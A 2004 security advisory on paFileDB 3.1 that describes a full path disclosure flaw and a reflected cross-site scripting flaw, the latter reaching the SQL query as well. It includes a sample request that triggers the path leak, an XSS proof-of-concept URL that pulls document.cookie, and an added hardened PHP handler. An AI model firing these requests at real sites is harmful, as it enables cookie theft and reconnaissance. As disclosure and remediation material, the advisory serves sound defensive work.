[UNIX] paFileDB Multiple Vulnerabilities (XSS, Path Disclosure)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/02/04
To: list@securiteam.com Date: 2 May 2004 11:25:25 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
paFileDB Multiple Vulnerabilities (XSS, Path Disclosure)
------------------------------------------------------------------------
SUMMARY
" <http://www.phparena.net/pafiledb.php> paFileDB is designed to allow
webmasters to have a database of files for download on their site. To add a
download, all you do is upload the file using FTP or whatever method you
use, log into paFileDB's admin center, and fill out a form to add a file.
paFileDB lets you edit and delete the files too. No more messing with a
bunch of HTML pages for a file database on your site! Using speedy MySQL
for storing data, and powerful PHP for processing everything, paFileDB is
one of the best and easiest ways to manage files!"
The script package is prone to cross-site scripting attacks and
information gathering by full path disclosure.
DETAILS
Vulnerable Systems:
* paFileDB version 3.1, possibly prior
Path Disclosure
This vulnerability would allow a remote user to determine the full path to
the web root directory and other potentially sensitive information.
An example HTTP request:
http://site/includes/admin/login.php?formname=DarkBicho&formpass=DarkBicho&B1=%3E%3E Log In %3C%3C&action=admin&login=do
A standard PHP fatal error is returned, disclosing the full filesystem path
to the web root directory and to the script:
Fatal error: Call to undefined function: locbar() in
/home/site/includes/admin/login.php on line 12
Additional vulnerable scripts (the list is by no means complete):
http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php
Cross-site Scripting
The XSS condition occurs because the 'id' parameter is not thoroughly
sanitized before it is reflected in the error page:
http://localhost/pafiledb.php?action=category&id='<scr!pt>alert(document.cookie);</scr!pt>
The error message returned by the server (note that it also shows the
unescaped quote reaching the SQL query) is:
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE
cat_id = '''
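As an added illustration for both issues above (not paFileDB's own code), the following hardened handler for the category request keeps error detail server side, refuses direct requests to include files, validates 'id' as a numeric key before it reaches the query, and HTML-escapes anything reflected back. The IN_PAFILEDB constant, the $db mysqli connection and the load_category() function are assumptions; only the pafiledb_cat table and cat_id column come from the advisory.

```php
<?php
// Added example, not paFileDB's own code. Assumes a mysqli connection in $db
// and that the main script defines IN_PAFILEDB before including this file.

// 1. Never show paths or query text to the client; log them instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// 2. Direct requests to includes/*.php produced the "Call to undefined
//    function" fatal error that leaked the path, so refuse them here.
if (!defined('IN_PAFILEDB')) {
    http_response_code(403);
    exit('Access denied.');
}

function load_category(mysqli $db, string $raw_id): ?array
{
    // 3. cat_id is a numeric key: validate it instead of quoting arbitrary
    //    input into the SQL string, which is how the quote in the report
    //    reached the query and the HTML reached the error page.
    if (!ctype_digit($raw_id) || strlen($raw_id) > 9) {
        return null;
    }
    $id = (int) $raw_id;

    // 4. Prepared statement: the value is bound, never interpolated.
    $stmt = $db->prepare('SELECT * FROM pafiledb_cat WHERE cat_id = ?');
    if ($stmt === false) {
        error_log('pafiledb: prepare failed: ' . $db->error); // server log only
        return null;
    }
    $stmt->bind_param('i', $id);
    if (!$stmt->execute()) {
        error_log('pafiledb: query failed: ' . $stmt->error);
        return null;
    }
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

$category = load_category($db, $_GET['id'] ?? '');
if ($category === null) {
    // 5. Generic message; the reflected value is always HTML-escaped.
    http_response_code(404);
    echo 'Category not found: '
        . htmlspecialchars($_GET['id'] ?? '', ENT_QUOTES, 'UTF-8');
    exit;
}
```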
ADDITIONAL INFORMATION
The information has been provided by <mailto:k1ll3rb0y@hotmail.com>
k1LL3r B0y.